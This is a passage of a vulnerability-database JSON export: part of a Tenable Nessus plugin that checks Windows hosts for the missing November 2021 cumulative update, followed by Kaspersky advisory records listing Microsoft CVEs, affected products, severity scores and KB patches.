2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007206.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42275,\n CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42278, CVE-2021-42280,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007206\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007206.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007206');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'17763',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007206])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-01-19T17:37:12", "description": "### *Detect date*:\n11/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 8.1 for 32-bit systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2022 \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2022 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2016 (Server Core installation) \nWindows 11 for x64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nRemote Desktop client for Windows Desktop \nWindows 10 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-42282](<https://nvd.nist.gov/vuln/detail/CVE-2021-42282>) \n[CVE-2021-41367](<https://nvd.nist.gov/vuln/detail/CVE-2021-41367>) \n[CVE-2021-41371](<https://nvd.nist.gov/vuln/detail/CVE-2021-41371>) \n[CVE-2021-38665](<https://nvd.nist.gov/vuln/detail/CVE-2021-38665>) \n[CVE-2021-38666](<https://nvd.nist.gov/vuln/detail/CVE-2021-38666>) \n[CVE-2021-42291](<https://nvd.nist.gov/vuln/detail/CVE-2021-42291>) \n[CVE-2021-42278](<https://nvd.nist.gov/vuln/detail/CVE-2021-42278>) \n[CVE-2021-41377](<https://nvd.nist.gov/vuln/detail/CVE-2021-41377>) \n[CVE-2021-41379](<https://nvd.nist.gov/vuln/detail/CVE-2021-41379>) \n[CVE-2021-42285](<https://nvd.nist.gov/vuln/detail/CVE-2021-42285>) \n[CVE-2021-42283](<https://nvd.nist.gov/vuln/detail/CVE-2021-42283>) \n[CVE-2021-42275](<https://nvd.nist.gov/vuln/detail/CVE-2021-42275>) \n[CVE-2021-38631](<https://nvd.nist.gov/vuln/detail/CVE-2021-38631>) \n[CVE-2021-41370](<https://nvd.nist.gov/vuln/detail/CVE-2021-41370>) \n[CVE-2021-42287](<https://nvd.nist.gov/vuln/detail/CVE-2021-42287>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-42282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42282>)6.5High \n[CVE-2021-41367](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41367>)4.6Warning \n[CVE-2021-41371](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41371>)2.1Warning \n[CVE-2021-38665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38665>)4.3Warning \n[CVE-2021-38666](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38666>)6.8High \n[CVE-2021-42291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42291>)6.5High \n[CVE-2021-42278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42278>)6.5High \n[CVE-2021-41377](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41377>)4.6Warning \n[CVE-2021-41379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379>)4.6Warning \n[CVE-2021-42285](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42285>)7.2High \n[CVE-2021-42283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42283>)4.6Warning \n[CVE-2021-42275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42275>)6.5High \n[CVE-2021-38631](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38631>)2.1Warning \n[CVE-2021-41370](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41370>)4.6Warning \n[CVE-2021-42287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42287>)6.5High\n\n### *KB list*:\n[5007233](<http://support.microsoft.com/kb/5007233>) \n[5007236](<http://support.microsoft.com/kb/5007236>) \n[5007263](<http://support.microsoft.com/kb/5007263>) \n[5007246](<http://support.microsoft.com/kb/5007246>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "kaspersky", "title": "KLA12341 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-01-18T00:00:00", "id": "KLA12341", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12341/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-22T23:23:21", "description": "### *Detect date*:\n02/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to cause denial of service, gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2019 \nWindows RT 8.1 \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server, version 1909 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-24080](<https://nvd.nist.gov/vuln/detail/CVE-2021-24080>) \n[CVE-2021-24103](<https://nvd.nist.gov/vuln/detail/CVE-2021-24103>) \n[CVE-2021-24093](<https://nvd.nist.gov/vuln/detail/CVE-2021-24093>) \n[CVE-2021-1734](<https://nvd.nist.gov/vuln/detail/CVE-2021-1734>) \n[CVE-2021-25195](<https://nvd.nist.gov/vuln/detail/CVE-2021-25195>) \n[CVE-2021-24086](<https://nvd.nist.gov/vuln/detail/CVE-2021-24086>) \n[CVE-2021-1727](<https://nvd.nist.gov/vuln/detail/CVE-2021-1727>) \n[CVE-2021-24102](<https://nvd.nist.gov/vuln/detail/CVE-2021-24102>) \n[CVE-2021-24094](<https://nvd.nist.gov/vuln/detail/CVE-2021-24094>) \n[CVE-2021-24076](<https://nvd.nist.gov/vuln/detail/CVE-2021-24076>) \n[CVE-2021-24078](<https://nvd.nist.gov/vuln/detail/CVE-2021-24078>) \n[CVE-2021-24084](<https://nvd.nist.gov/vuln/detail/CVE-2021-24084>) \n[CVE-2021-24075](<https://nvd.nist.gov/vuln/detail/CVE-2021-24075>) \n[CVE-2021-24082](<https://nvd.nist.gov/vuln/detail/CVE-2021-24082>) \n[CVE-2021-1731](<https://nvd.nist.gov/vuln/detail/CVE-2021-1731>) \n[CVE-2021-24083](<https://nvd.nist.gov/vuln/detail/CVE-2021-24083>) \n[CVE-2021-24079](<https://nvd.nist.gov/vuln/detail/CVE-2021-24079>) \n[CVE-2021-24096](<https://nvd.nist.gov/vuln/detail/CVE-2021-24096>) \n[CVE-2021-1722](<https://nvd.nist.gov/vuln/detail/CVE-2021-1722>) \n[CVE-2021-24098](<https://nvd.nist.gov/vuln/detail/CVE-2021-24098>) \n[CVE-2021-24074](<https://nvd.nist.gov/vuln/detail/CVE-2021-24074>) \n[CVE-2021-24088](<https://nvd.nist.gov/vuln/detail/CVE-2021-24088>) \n[CVE-2021-24081](<https://nvd.nist.gov/vuln/detail/CVE-2021-24081>) \n[CVE-2021-24077](<https://nvd.nist.gov/vuln/detail/CVE-2021-24077>) \n[CVE-2021-1698](<https://nvd.nist.gov/vuln/detail/CVE-2021-1698>) \n[CVE-2021-24106](<https://nvd.nist.gov/vuln/detail/CVE-2021-24106>) \n[CVE-2021-1732](<https://nvd.nist.gov/vuln/detail/CVE-2021-1732>) \n[CVE-2021-24091](<https://nvd.nist.gov/vuln/detail/CVE-2021-24091>) \n[CVE-2020-17162](<https://nvd.nist.gov/vuln/detail/CVE-2020-17162>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[4577048](<http://support.microsoft.com/kb/4577048>) \n[4571756](<http://support.microsoft.com/kb/4571756>) \n[4570333](<http://support.microsoft.com/kb/4570333>) \n[4577032](<http://support.microsoft.com/kb/4577032>) \n[4577049](<http://support.microsoft.com/kb/4577049>) \n[4577015](<http://support.microsoft.com/kb/4577015>) \n[4577066](<http://support.microsoft.com/kb/4577066>) \n[4574727](<http://support.microsoft.com/kb/4574727>) \n[4577071](<http://support.microsoft.com/kb/4577071>) \n[4577038](<http://support.microsoft.com/kb/4577038>) \n[4601354](<http://support.microsoft.com/kb/4601354>) \n[4601319](<http://support.microsoft.com/kb/4601319>) \n[4601315](<http://support.microsoft.com/kb/4601315>) \n[4601345](<http://support.microsoft.com/kb/4601345>) \n[4601357](<http://support.microsoft.com/kb/4601357>) \n[4601348](<http://support.microsoft.com/kb/4601348>) \n[4601318](<http://support.microsoft.com/kb/4601318>) \n[4601384](<http://support.microsoft.com/kb/4601384>) \n[4601349](<http://support.microsoft.com/kb/4601349>) \n[4601331](<http://support.microsoft.com/kb/4601331>) \n[5008218](<http://support.microsoft.com/kb/5008218>) \n[5008206](<http://support.microsoft.com/kb/5008206>) \n[5008212](<http://support.microsoft.com/kb/5008212>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "kaspersky", "title": "KLA12071 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17162", "CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-12-16T00:00:00", "id": "KLA12071", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12071/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T17:36:53", "description": "### *Detect date*:\n11/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 8.1 for 32-bit systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2022 \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2022 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2016 (Server Core installation) \nWindows 11 for x64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-41367](<https://nvd.nist.gov/vuln/detail/CVE-2021-41367>) \n[CVE-2021-38665](<https://nvd.nist.gov/vuln/detail/CVE-2021-38665>) \n[CVE-2021-26443](<https://nvd.nist.gov/vuln/detail/CVE-2021-26443>) \n[CVE-2021-38666](<https://nvd.nist.gov/vuln/detail/CVE-2021-38666>) \n[CVE-2021-42291](<https://nvd.nist.gov/vuln/detail/CVE-2021-42291>) \n[CVE-2021-42280](<https://nvd.nist.gov/vuln/detail/CVE-2021-42280>) \n[CVE-2021-42288](<https://nvd.nist.gov/vuln/detail/CVE-2021-42288>) \n[CVE-2021-41377](<https://nvd.nist.gov/vuln/detail/CVE-2021-41377>) \n[CVE-2021-42276](<https://nvd.nist.gov/vuln/detail/CVE-2021-42276>) \n[CVE-2021-42278](<https://nvd.nist.gov/vuln/detail/CVE-2021-42278>) \n[CVE-2021-36957](<https://nvd.nist.gov/vuln/detail/CVE-2021-36957>) \n[CVE-2021-42285](<https://nvd.nist.gov/vuln/detail/CVE-2021-42285>) \n[CVE-2021-42283](<https://nvd.nist.gov/vuln/detail/CVE-2021-42283>) \n[CVE-2021-42279](<https://nvd.nist.gov/vuln/detail/CVE-2021-42279>) \n[CVE-2021-38631](<https://nvd.nist.gov/vuln/detail/CVE-2021-38631>) \n[CVE-2021-42287](<https://nvd.nist.gov/vuln/detail/CVE-2021-42287>) \n[CVE-2021-42284](<https://nvd.nist.gov/vuln/detail/CVE-2021-42284>) \n[CVE-2021-42282](<https://nvd.nist.gov/vuln/detail/CVE-2021-42282>) \n[CVE-2021-42286](<https://nvd.nist.gov/vuln/detail/CVE-2021-42286>) \n[CVE-2021-41371](<https://nvd.nist.gov/vuln/detail/CVE-2021-41371>) \n[CVE-2021-42274](<https://nvd.nist.gov/vuln/detail/CVE-2021-42274>) \n[CVE-2021-42277](<https://nvd.nist.gov/vuln/detail/CVE-2021-42277>) \n[CVE-2021-41379](<https://nvd.nist.gov/vuln/detail/CVE-2021-41379>) \n[CVE-2021-41378](<https://nvd.nist.gov/vuln/detail/CVE-2021-41378>) \n[CVE-2021-41356](<https://nvd.nist.gov/vuln/detail/CVE-2021-41356>) \n[CVE-2021-42275](<https://nvd.nist.gov/vuln/detail/CVE-2021-42275>) \n[CVE-2021-41366](<https://nvd.nist.gov/vuln/detail/CVE-2021-41366>) \n[CVE-2021-41370](<https://nvd.nist.gov/vuln/detail/CVE-2021-41370>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2021-42282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42282>)6.5High \n[CVE-2021-41367](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41367>)4.6Warning \n[CVE-2021-41371](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41371>)2.1Warning \n[CVE-2021-38665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38665>)4.3Warning \n[CVE-2021-38666](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38666>)6.8High \n[CVE-2021-42291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42291>)6.5High \n[CVE-2021-42278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42278>)6.5High \n[CVE-2021-41377](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41377>)4.6Warning \n[CVE-2021-41379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379>)4.6Warning \n[CVE-2021-42285](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42285>)7.2High \n[CVE-2021-42283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42283>)4.6Warning \n[CVE-2021-42275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42275>)6.5High \n[CVE-2021-38631](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38631>)2.1Warning \n[CVE-2021-41370](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41370>)4.6Warning \n[CVE-2021-42287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42287>)6.5High \n[CVE-2021-26443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26443>)7.7Critical \n[CVE-2021-42280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42280>)4.6Warning \n[CVE-2021-42288](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42288>)3.6Warning \n[CVE-2021-42276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42276>)6.8High \n[CVE-2021-36957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36957>)4.6Warning \n[CVE-2021-42279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42279>)5.1High \n[CVE-2021-42284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42284>)7.1High \n[CVE-2021-42286](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42286>)4.6Warning \n[CVE-2021-42274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42274>)2.1Warning \n[CVE-2021-42277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42277>)4.6Warning \n[CVE-2021-41378](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41378>)6.5High \n[CVE-2021-41356](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41356>)5.0Critical \n[CVE-2021-41366](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41366>)4.6Warning\n\n### *KB list*:\n[5007260](<http://support.microsoft.com/kb/5007260>) \n[5007255](<http://support.microsoft.com/kb/5007255>) \n[5007206](<http://support.microsoft.com/kb/5007206>) \n[5007207](<http://support.microsoft.com/kb/5007207>) \n[5007186](<http://support.microsoft.com/kb/5007186>) \n[5007192](<http://support.microsoft.com/kb/5007192>) \n[5007215](<http://support.microsoft.com/kb/5007215>) \n[5007205](<http://support.microsoft.com/kb/5007205>) \n[5007245](<http://support.microsoft.com/kb/5007245>) \n[5007247](<http://support.microsoft.com/kb/5007247>) \n[5007189](<http://support.microsoft.com/kb/5007189>)\n\n### *Microsoft official 